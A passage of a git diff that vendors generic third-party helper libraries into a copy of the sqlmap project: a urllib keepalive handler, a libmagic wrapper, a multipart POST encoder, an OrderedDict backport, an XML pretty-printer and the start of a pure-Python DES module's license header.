connection to %s (%d)", + host, id(h)) + self._cm.add(host, h, 0) + self._start_transaction(h, req) + r = h.getresponse() + except (socket.error, _http_client.HTTPException) as err: + raise _urllib.error.URLError(err) + + if DEBUG: DEBUG.info("STATUS: %s, %s", r.status, r.reason) + + # if not a persistent connection, don't try to reuse it + if r.will_close: + if DEBUG: DEBUG.info('server will close connection, discarding') + self._cm.remove(h) + + r._handler = self + r._host = host + r._url = req.get_full_url() + r._connection = h + r.code = r.status + r.headers = r.msg + r.msg = r.reason + + if r.status == 200 or not HANDLE_ERRORS: + return r + else: + return self.parent.error('http', req, r, + r.status, r.msg, r.headers) + + def _reuse_connection(self, h, req, host): + """start the transaction with a re-used connection + return a response object (r) upon success or None on failure. + This DOES not close or remove bad connections in cases where + it returns. However, if an unexpected exception occurs, it + will close and remove the connection before re-raising. + """ + try: + self._start_transaction(h, req) + r = h.getresponse() + # note: just because we got something back doesn't mean it + # worked. We'll check the version below, too. + except (socket.error, _http_client.HTTPException): + r = None + except: + # adding this block just in case we've missed + # something we will still raise the exception, but + # lets try and close the connection and remove it + # first. We previously got into a nasty loop + # where an exception was uncaught, and so the + # connection stayed open. On the next try, the + # same exception was raised, etc. The tradeoff is + # that it's now possible this call will raise + # a DIFFERENT exception + if DEBUG: DEBUG.error("unexpected exception - closing " + \ + "connection to %s (%d)", host, id(h)) + self._cm.remove(h) + h.close() + raise + + if r is None or r.version == 9: + # httplib falls back to assuming HTTP 0.9 if it gets a + # bad header back. This is most likely to happen if + # the socket has been closed by the server since we + # last used the connection. + if DEBUG: DEBUG.info("failed to re-use connection to %s (%d)", + host, id(h)) + r = None + else: + if DEBUG: DEBUG.info("re-using connection to %s (%d)", host, id(h)) + + return r + + def _start_transaction(self, h, req): + try: + if req.data: + data = req.data + if hasattr(req, 'selector'): + h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + else: + h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + if 'Content-type' not in req.headers: + h.putheader('Content-type', + 'application/x-www-form-urlencoded') + if 'Content-length' not in req.headers: + h.putheader('Content-length', '%d' % len(data)) + else: + if hasattr(req, 'selector'): + h.putrequest(req.get_method() or 'GET', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + else: + h.putrequest(req.get_method() or 'GET', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + except (socket.error, _http_client.HTTPException) as err: + raise _urllib.error.URLError(err) + + if 'Connection' not in req.headers: + req.headers['Connection'] = 'keep-alive' + + for args in self.parent.addheaders: + if args[0] not in req.headers: + h.putheader(*args) + for k, v in req.headers.items(): + h.putheader(k, v) + h.endheaders() + if req.data: + h.send(data) + + def _get_connection(self, host): + return NotImplementedError + +class HTTPHandler(KeepAliveHandler, _urllib.request.HTTPHandler): + def __init__(self): + KeepAliveHandler.__init__(self) + + def http_open(self, req): + return self.do_open(req) + + def _get_connection(self, host): + return HTTPConnection(host) + +class HTTPSHandler(KeepAliveHandler, _urllib.request.HTTPSHandler): + def __init__(self, ssl_factory=None): + KeepAliveHandler.__init__(self) + if not ssl_factory: + try: + import sslfactory + ssl_factory = sslfactory.get_factory() + except ImportError: + pass + self._ssl_factory = ssl_factory + + def https_open(self, req): + return self.do_open(req) + + def _get_connection(self, host): + try: return self._ssl_factory.get_https_connection(host) + except AttributeError: return HTTPSConnection(host) + +class HTTPResponse(_http_client.HTTPResponse): + # we need to subclass HTTPResponse in order to + # 1) add readline() and readlines() methods + # 2) add close_connection() methods + # 3) add info() and geturl() methods + + # in order to add readline(), read must be modified to deal with a + # buffer. example: readline must read a buffer and then spit back + # one line at a time. The only real alternative is to read one + # BYTE at a time (ick). Once something has been read, it can't be + # put back (ok, maybe it can, but that's even uglier than this), + # so if you THEN do a normal read, you must first take stuff from + # the buffer. + + # the read method wraps the original to accomodate buffering, + # although read() never adds to the buffer. + # Both readline and readlines have been stolen with almost no + # modification from socket.py + + + def __init__(self, sock, debuglevel=0, strict=0, method=None): + if method: # the httplib in python 2.3 uses the method arg + _http_client.HTTPResponse.__init__(self, sock, debuglevel, method) + else: # 2.2 doesn't + _http_client.HTTPResponse.__init__(self, sock, debuglevel) + self.fileno = sock.fileno + self.code = None + self._method = method + self._rbuf = b"" + self._rbufsize = 8096 + self._handler = None # inserted by the handler later + self._host = None # (same) + self._url = None # (same) + self._connection = None # (same) + + _raw_read = _http_client.HTTPResponse.read + + def close(self): + if self.fp: + self.fp.close() + self.fp = None + if self._handler: + self._handler._request_closed(self, self._host, + self._connection) + + # Note: Patch for Python3 (otherwise, connections won't be reusable) + def _close_conn(self): + self.close() + + def close_connection(self): + self._handler._remove_connection(self._host, self._connection, close=1) + self.close() + + def info(self): + return self.headers + + def geturl(self): + return self._url + + def read(self, amt=None): + # the _rbuf test is only in this first if for speed. It's not + # logically necessary + if self._rbuf and not amt is None: + L = len(self._rbuf) + if amt > L: + amt -= L + else: + s = self._rbuf[:amt] + self._rbuf = self._rbuf[amt:] + return s + + s = self._rbuf + self._raw_read(amt) + self._rbuf = b"" + return s + + def readline(self, limit=-1): + data = b"" + i = self._rbuf.find('\n') + while i < 0 and not (0 < limit <= len(self._rbuf)): + new = self._raw_read(self._rbufsize) + if not new: break + i = new.find('\n') + if i >= 0: i = i + len(self._rbuf) + self._rbuf = self._rbuf + new + if i < 0: i = len(self._rbuf) + else: i = i+1 + if 0 <= limit < len(self._rbuf): i = limit + data, self._rbuf = self._rbuf[:i], self._rbuf[i:] + return data + + def readlines(self, sizehint = 0): + total = 0 + list = [] + while 1: + line = self.readline() + if not line: break + list.append(line) + total += len(line) + if sizehint and total >= sizehint: + break + return list + + +class HTTPConnection(_http_client.HTTPConnection): + # use the modified response class + response_class = HTTPResponse + +class HTTPSConnection(_http_client.HTTPSConnection): + response_class = HTTPResponse + +######################################################################### +##### TEST FUNCTIONS +######################################################################### + +def error_handler(url): + global HANDLE_ERRORS + orig = HANDLE_ERRORS + keepalive_handler = HTTPHandler() + opener = _urllib.request.build_opener(keepalive_handler) + _urllib.request.install_opener(opener) + pos = {0: 'off', 1: 'on'} + for i in (0, 1): + print(" fancy error handling %s (HANDLE_ERRORS = %i)" % (pos[i], i)) + HANDLE_ERRORS = i + try: + fo = _urllib.request.urlopen(url) + foo = fo.read() + fo.close() + try: status, reason = fo.status, fo.reason + except AttributeError: status, reason = None, None + except IOError as e: + print(" EXCEPTION: %s" % e) + raise + else: + print(" status = %s, reason = %s" % (status, reason)) + HANDLE_ERRORS = orig + hosts = keepalive_handler.open_connections() + print("open connections:", hosts) + keepalive_handler.close_all() + +def continuity(url): + from hashlib import md5 + format = '%25s: %s' + + # first fetch the file with the normal http handler + opener = _urllib.request.build_opener() + _urllib.request.install_opener(opener) + fo = _urllib.request.urlopen(url) + foo = fo.read() + fo.close() + m = md5(foo) + print(format % ('normal urllib', m.hexdigest())) + + # now install the keepalive handler and try again + opener = _urllib.request.build_opener(HTTPHandler()) + _urllib.request.install_opener(opener) + + fo = _urllib.request.urlopen(url) + foo = fo.read() + fo.close() + m = md5(foo) + print(format % ('keepalive read', m.hexdigest())) + + fo = _urllib.request.urlopen(url) + foo = '' + while 1: + f = fo.readline() + if f: foo = foo + f + else: break + fo.close() + m = md5(foo) + print(format % ('keepalive readline', m.hexdigest())) + +def comp(N, url): + print(' making %i connections to:\n %s' % (N, url)) + + sys.stdout.write(' first using the normal urllib handlers') + # first use normal opener + opener = _urllib.request.build_opener() + _urllib.request.install_opener(opener) + t1 = fetch(N, url) + print(' TIME: %.3f s' % t1) + + sys.stdout.write(' now using the keepalive handler ') + # now install the keepalive handler and try again + opener = _urllib.request.build_opener(HTTPHandler()) + _urllib.request.install_opener(opener) + t2 = fetch(N, url) + print(' TIME: %.3f s' % t2) + print(' improvement factor: %.2f' % (t1/t2, )) + +def fetch(N, url, delay=0): + import time + lens = [] + starttime = time.time() + for i in _range(N): + if delay and i > 0: time.sleep(delay) + fo = _urllib.request.urlopen(url) + foo = fo.read() + fo.close() + lens.append(len(foo)) + diff = time.time() - starttime + + j = 0 + for i in lens[1:]: + j = j + 1 + if not i == lens[0]: + print("WARNING: inconsistent length on read %i: %i" % (j, i)) + + return diff + +def test_timeout(url): + global DEBUG + dbbackup = DEBUG + class FakeLogger: + def debug(self, msg, *args): print(msg % args) + info = warning = error = debug + DEBUG = FakeLogger() + print(" fetching the file to establish a connection") + fo = _urllib.request.urlopen(url) + data1 = fo.read() + fo.close() + + i = 20 + print(" waiting %i seconds for the server to close the connection" % i) + while i > 0: + sys.stdout.write('\r %2i' % i) + sys.stdout.flush() + time.sleep(1) + i -= 1 + sys.stderr.write('\r') + + print(" fetching the file a second time") + fo = _urllib.request.urlopen(url) + data2 = fo.read() + fo.close() + + if data1 == data2: + print(' data are identical') + else: + print(' ERROR: DATA DIFFER') + + DEBUG = dbbackup + + +def test(url, N=10): + print("checking error hander (do this on a non-200)") + try: error_handler(url) + except IOError as e: + print("exiting - exception will prevent further tests") + sys.exit() + print() + print("performing continuity test (making sure stuff isn't corrupted)") + continuity(url) + print() + print("performing speed comparison") + comp(N, url) + print() + print("performing dropped-connection check") + test_timeout(url) + +if __name__ == '__main__': + import time + import sys + try: + N = int(sys.argv[1]) + url = sys.argv[2] + except: + print("%s " % sys.argv[0]) + else: + test(url, N) diff --git a/src/sqlmap-master/thirdparty/magic/__init__.py b/src/sqlmap-master/thirdparty/magic/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/sqlmap-master/thirdparty/magic/magic.py b/src/sqlmap-master/thirdparty/magic/magic.py new file mode 100644 index 0000000..0a5c257 --- /dev/null +++ b/src/sqlmap-master/thirdparty/magic/magic.py @@ -0,0 +1,225 @@ +""" +magic is a wrapper around the libmagic file identification library. + +Usage: + +>>> import magic +>>> magic.from_file("testdata/test.pdf") +'PDF document, version 1.2' +>>> magic.from_file("testdata/test.pdf", mime=True) +'application/pdf' +>>> magic.from_buffer(open("testdata/test.pdf").read(1024)) +'PDF document, version 1.2' +>>> + +""" + +import sys +import os.path + +class MagicException(Exception): + pass + +class Magic: + """ + Magic is a wrapper around the libmagic C library. + """ + + def __init__(self, mime=False, magic_file=None, mime_encoding=False): + """ + Create a new libmagic wrapper. + + mime - if True, mimetypes are returned instead of textual descriptions + mime_encoding - if True, codec is returned + magic_file - use a mime database other than the system default + """ + + flags = MAGIC_NONE + if mime: + flags |= MAGIC_MIME + elif mime_encoding: + flags |= MAGIC_MIME_ENCODING + + self.cookie = magic_open(flags) + + magic_load(self.cookie, magic_file) + + + def from_buffer(self, buf): + """ + Identify the contents of `buf` + """ + + return magic_buffer(self.cookie, buf) + + def from_file(self, filename): + """ + Identify the contents of file `filename` + raises IOError if the file does not exist + """ + + if not os.path.exists(filename): + raise IOError("File does not exist: " + filename) + + return magic_file(self.cookie, filename) + + def __del__(self): + # during shutdown magic_close may have been cleared already + if self.cookie and magic_close: + magic_close(self.cookie) + self.cookie = None + +_magic_mime = None +_magic = None + +def _get_magic_mime(): + global _magic_mime + if not _magic_mime: + _magic_mime = Magic(mime=True) + return _magic_mime + +def _get_magic(): + global _magic + if not _magic: + _magic = Magic() + return _magic + +def _get_magic_type(mime): + if mime: + return _get_magic_mime() + else: + return _get_magic() + +def from_file(filename, mime=False): + m = _get_magic_type(mime) + return m.from_file(filename) + +def from_buffer(buffer, mime=False): + m = _get_magic_type(mime) + return m.from_buffer(buffer) + +try: + libmagic = None + + import ctypes + import ctypes.util + + from ctypes import c_char_p, c_int, c_size_t, c_void_p + + # Let's try to find magic or magic1 + dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1') + + # This is necessary because find_library returns None if it doesn't find the library + if dll: + try: + libmagic = ctypes.CDLL(dll) + except WindowsError: + pass + + if not libmagic or not libmagic._name: + platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib', + '/usr/local/lib/libmagic.dylib', + '/usr/local/Cellar/libmagic/5.10/lib/libmagic.dylib'], + 'win32': ['magic1.dll']} + for dll in platform_to_lib.get(sys.platform, []): + try: + libmagic = ctypes.CDLL(dll) + except OSError: + pass + + if not libmagic or not libmagic._name: + # It is better to raise an ImportError since we are importing magic module + raise ImportError('failed to find libmagic. Check your installation') + + magic_t = ctypes.c_void_p + + def errorcheck(result, func, args): + err = magic_error(args[0]) + if err is not None: + raise MagicException(err) + else: + return result + + def coerce_filename(filename): + if filename is None: + return None + return filename.encode(sys.getfilesystemencoding()) + + magic_open = libmagic.magic_open + magic_open.restype = magic_t + magic_open.argtypes = [c_int] + + magic_close = libmagic.magic_close + magic_close.restype = None + magic_close.argtypes = [magic_t] + + magic_error = libmagic.magic_error + magic_error.restype = c_char_p + magic_error.argtypes = [magic_t] + + magic_errno = libmagic.magic_errno + magic_errno.restype = c_int + magic_errno.argtypes = [magic_t] + + _magic_file = libmagic.magic_file + _magic_file.restype = c_char_p + _magic_file.argtypes = [magic_t, c_char_p] + _magic_file.errcheck = errorcheck + + def magic_file(cookie, filename): + return _magic_file(cookie, coerce_filename(filename)) + + _magic_buffer = libmagic.magic_buffer + _magic_buffer.restype = c_char_p + _magic_buffer.argtypes = [magic_t, c_void_p, c_size_t] + _magic_buffer.errcheck = errorcheck + + + def magic_buffer(cookie, buf): + return _magic_buffer(cookie, buf, len(buf)) + + _magic_load = libmagic.magic_load + _magic_load.restype = c_int + _magic_load.argtypes = [magic_t, c_char_p] + _magic_load.errcheck = errorcheck + + def magic_load(cookie, filename): + return _magic_load(cookie, coerce_filename(filename)) + + magic_setflags = libmagic.magic_setflags + magic_setflags.restype = c_int + magic_setflags.argtypes = [magic_t, c_int] + + magic_check = libmagic.magic_check + magic_check.restype = c_int + magic_check.argtypes = [magic_t, c_char_p] + + magic_compile = libmagic.magic_compile + magic_compile.restype = c_int + magic_compile.argtypes = [magic_t, c_char_p] + +except (ImportError, OSError): + from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE + +MAGIC_NONE = 0x000000 # No flags +MAGIC_DEBUG = 0x000001 # Turn on debugging +MAGIC_SYMLINK = 0x000002 # Follow symlinks +MAGIC_COMPRESS = 0x000004 # Check inside compressed files +MAGIC_DEVICES = 0x000008 # Look at the contents of devices +MAGIC_MIME = 0x000010 # Return a mime string +MAGIC_MIME_ENCODING = 0x000400 # Return the MIME encoding +MAGIC_CONTINUE = 0x000020 # Return all matches +MAGIC_CHECK = 0x000040 # Print warnings to stderr +MAGIC_PRESERVE_ATIME = 0x000080 # Restore access time on exit +MAGIC_RAW = 0x000100 # Don't translate unprintable chars +MAGIC_ERROR = 0x000200 # Handle ENOENT etc as real errors +MAGIC_NO_CHECK_COMPRESS = 0x001000 # Don't check for compressed files +MAGIC_NO_CHECK_TAR = 0x002000 # Don't check for tar files +MAGIC_NO_CHECK_SOFT = 0x004000 # Don't check magic entries +MAGIC_NO_CHECK_APPTYPE = 0x008000 # Don't check application type +MAGIC_NO_CHECK_ELF = 0x010000 # Don't check for elf details +MAGIC_NO_CHECK_ASCII = 0x020000 # Don't check for ascii files +MAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff +MAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran +MAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens +MAGIC_UNKNOWN_FILETYPE = b"unknown" diff --git a/src/sqlmap-master/thirdparty/multipart/__init__.py b/src/sqlmap-master/thirdparty/multipart/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/sqlmap-master/thirdparty/multipart/multipartpost.py b/src/sqlmap-master/thirdparty/multipart/multipartpost.py new file mode 100644 index 0000000..5ea37cc --- /dev/null +++ b/src/sqlmap-master/thirdparty/multipart/multipartpost.py @@ -0,0 +1,114 @@ +#!/usr/bin/env python + +""" +02/2006 Will Holcomb + +Reference: http://odin.himinbi.org/MultipartPostHandler.py + +This library is free software; you can redistribute it and/or +modify it under the terms of the GNU Lesser General Public +License as published by the Free Software Foundation; either +version 2.1 of the License, or (at your option) any later version. + +This library is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +Lesser General Public License for more details. + +You should have received a copy of the GNU Lesser General Public +License along with this library; if not, write to the Free Software +Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA +""" + +import io +import mimetypes +import os +import re +import stat +import sys + +from lib.core.compat import choose_boundary +from lib.core.convert import getBytes +from lib.core.exception import SqlmapDataException +from thirdparty.six.moves import urllib as _urllib + +# Controls how sequences are uncoded. If true, elements may be given +# multiple values by assigning a sequence. +doseq = 1 + + +class MultipartPostHandler(_urllib.request.BaseHandler): + handler_order = _urllib.request.HTTPHandler.handler_order - 10 # needs to run first + + def http_request(self, request): + data = request.data + + if isinstance(data, dict): + v_files = [] + v_vars = [] + + try: + for(key, value) in data.items(): + if hasattr(value, "fileno") or hasattr(value, "file") or isinstance(value, io.IOBase): + v_files.append((key, value)) + else: + v_vars.append((key, value)) + except TypeError: + systype, value, traceback = sys.exc_info() + raise SqlmapDataException("not a valid non-string sequence or mapping object '%s'" % traceback) + + if len(v_files) == 0: + data = _urllib.parse.urlencode(v_vars, doseq) + else: + boundary, data = self.multipart_encode(v_vars, v_files) + contenttype = "multipart/form-data; boundary=%s" % boundary + #if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0): + # print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data") + request.add_unredirected_header("Content-Type", contenttype) + + request.data = data + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235 + if request.data: + for match in re.finditer(b"(?i)\\s*-{20,}\\w+(\\s+Content-Disposition[^\\n]+\\s+|\\-\\-\\s*)", request.data): + part = match.group(0) + if b'\r' not in part: + request.data = request.data.replace(part, part.replace(b'\n', b"\r\n")) + + return request + + def multipart_encode(self, vars, files, boundary=None, buf=None): + if boundary is None: + boundary = choose_boundary() + + if buf is None: + buf = b"" + + for (key, value) in vars: + if key is not None and value is not None: + buf += b"--%s\r\n" % getBytes(boundary) + buf += b"Content-Disposition: form-data; name=\"%s\"" % getBytes(key) + buf += b"\r\n\r\n" + getBytes(value) + b"\r\n" + + for (key, fd) in files: + file_size = fd.len if hasattr(fd, "len") else os.fstat(fd.fileno())[stat.ST_SIZE] + filename = fd.name.split("/")[-1] if "/" in fd.name else fd.name.split("\\")[-1] + try: + contenttype = mimetypes.guess_type(filename)[0] or b"application/octet-stream" + except: + # Reference: http://bugs.python.org/issue9291 + contenttype = b"application/octet-stream" + buf += b"--%s\r\n" % getBytes(boundary) + buf += b"Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n" % (getBytes(key), getBytes(filename)) + buf += b"Content-Type: %s\r\n" % getBytes(contenttype) + # buf += b"Content-Length: %s\r\n" % file_size + fd.seek(0) + + buf += b"\r\n%s\r\n" % fd.read() + + buf += b"--%s--\r\n\r\n" % getBytes(boundary) + buf = getBytes(buf) + + return boundary, buf + + https_request = http_request diff --git a/src/sqlmap-master/thirdparty/odict/__init__.py b/src/sqlmap-master/thirdparty/odict/__init__.py new file mode 100644 index 0000000..8571776 --- /dev/null +++ b/src/sqlmap-master/thirdparty/odict/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +import sys + +if sys.version_info[:2] >= (2, 7): + from collections import OrderedDict +else: + from ordereddict import OrderedDict diff --git a/src/sqlmap-master/thirdparty/odict/ordereddict.py b/src/sqlmap-master/thirdparty/odict/ordereddict.py new file mode 100644 index 0000000..1cdd6f4 --- /dev/null +++ b/src/sqlmap-master/thirdparty/odict/ordereddict.py @@ -0,0 +1,133 @@ +# Copyright (c) 2009 Raymond Hettinger +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation files +# (the "Software"), to deal in the Software without restriction, +# including without limitation the rights to use, copy, modify, merge, +# publish, distribute, sublicense, and/or sell copies of the Software, +# and to permit persons to whom the Software is furnished to do so, +# subject to the following conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. + +try: + from UserDict import DictMixin +except ImportError: + try: + from collections.abc import MutableMapping as DictMixin + except ImportError: + from collections import MutableMapping as DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.__map = {} # key --> [key, prev, next] + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = next(reversed(self)) + else: + key = next(iter(self)) + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.iterkeys + itervalues = DictMixin.itervalues + iteritems = DictMixin.iteritems + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, list(self.items())) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + if len(self) != len(other): + return False + for p, q in zip(self.items(), other.items()): + if p != q: + return False + return True + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/src/sqlmap-master/thirdparty/prettyprint/__init__.py b/src/sqlmap-master/thirdparty/prettyprint/__init__.py new file mode 100644 index 0000000..1f9e143 --- /dev/null +++ b/src/sqlmap-master/thirdparty/prettyprint/__init__.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python + +#Copyright (c) 2010, Chris Hall +#All rights reserved. + +#Redistribution and use in source and binary forms, with or without modification, +#are permitted provided that the following conditions are met: + +#* Redistributions of source code must retain the above copyright notice, +#this list of conditions and the following disclaimer. +#* Redistributions in binary form must reproduce the above copyright notice, +#this list of conditions and the following disclaimer in the documentation +#and/or other materials provided with the distribution. + +#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR +#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +pass diff --git a/src/sqlmap-master/thirdparty/prettyprint/prettyprint.py b/src/sqlmap-master/thirdparty/prettyprint/prettyprint.py new file mode 100644 index 0000000..586d808 --- /dev/null +++ b/src/sqlmap-master/thirdparty/prettyprint/prettyprint.py @@ -0,0 +1,97 @@ +#!/usr/bin/env python + +#Copyright (c) 2010, Chris Hall +#All rights reserved. + +#Redistribution and use in source and binary forms, with or without modification, +#are permitted provided that the following conditions are met: + +#* Redistributions of source code must retain the above copyright notice, +#this list of conditions and the following disclaimer. +#* Redistributions in binary form must reproduce the above copyright notice, +#this list of conditions and the following disclaimer in the documentation +#and/or other materials provided with the distribution. + +#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR +#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +from xml.dom import minidom +from xml.dom import Node + +def format(text): + doc = minidom.parseString(text) + root = doc.childNodes[0] + return root.toprettyxml(indent=' ') + +def formatXML(doc, encoding=None): + root = doc.childNodes[0] + return root.toprettyxml(indent=' ', encoding=encoding) + +def _patch_minidom(): + minidom.Text.writexml = _writexml_text + minidom.Element.writexml = _writexml_element + minidom.Node.toprettyxml = _toprettyxml_node + +def _collapse(node): + for child in node.childNodes: + if child.nodeType == Node.TEXT_NODE and len(child.data.strip()) == 0: + child.data = '' + else: + _collapse(child) + +def _writexml_text(self, writer, indent="", addindent="", newl=""): + minidom._write_data(writer, "%s"%(self.data.strip())) + +def _writexml_element(self, writer, indent="", addindent="", newl=""): + # indent = current indentation + # addindent = indentation to add to higher levels + # newl = newline string + writer.write(indent+"<" + self.tagName) + + attrs = self._get_attributes() + a_names = attrs.keys() + a_names.sort() + + for a_name in a_names: + writer.write(" %s=\"" % a_name) + minidom._write_data(writer, attrs[a_name].value) + writer.write("\"") + if self.childNodes: + if self.childNodes[0].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0: + writer.write(">") + else: + writer.write(">%s"%(newl)) + for node in self.childNodes: + node.writexml(writer,indent+addindent,addindent,newl) + if self.childNodes[-1].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0: + writer.write("%s" % (self.tagName,newl)) + else: + writer.write("%s%s" % (indent,self.tagName,newl)) + else: + writer.write("/>%s"%(newl)) + +def _toprettyxml_node(self, indent="\t", newl="\n", encoding = None): + _collapse(self) + # indent = the indentation string to prepend, per level + # newl = the newline string to append + writer = minidom._get_StringIO() + if encoding is not None: + import codecs + # Can't use codecs.getwriter to preserve 2.0 compatibility + writer = codecs.lookup(encoding)[3](writer) + if self.nodeType == Node.DOCUMENT_NODE: + # Can pass encoding only to document, to put it into XML header + self.writexml(writer, "", indent, newl, encoding) + else: + self.writexml(writer, "", indent, newl) + return writer.getvalue() + +_patch_minidom() diff --git a/src/sqlmap-master/thirdparty/pydes/__init__.py b/src/sqlmap-master/thirdparty/pydes/__init__.py new file mode 100644 index 0000000..b412cc8 --- /dev/null +++ b/src/sqlmap-master/thirdparty/pydes/__init__.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python +# +# Copyright 2009 Todd Whiteman +# +# This program is free software: you can redistribute it and/or modify it +# under the terms of the GNU Lesser General Public License as published +# by the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . +# + +pass diff --git a/src/sqlmap-master/thirdparty/pydes/pyDes.py b/src/sqlmap-master/thirdparty/pydes/pyDes.py new file mode 100644 index 0000000..05cb1ad --- /dev/null +++ b/src/sqlmap-master/thirdparty/pydes/pyDes.py @@ -0,0 +1,852 @@ +############################################################################# +# Documentation # +############################################################################# + +# Author: Todd Whiteman +# Date: 16th March, 2009 +# Version: 2.0.1 +# License: Public Domain - free to do as you wish +# Homepage: http://twhiteman.netfirms.com/des.html +# +# This is a pure python implementation of the DES encryption algorithm. +# It's pure python to avoid portability issues, since most DES +# implementations are programmed in 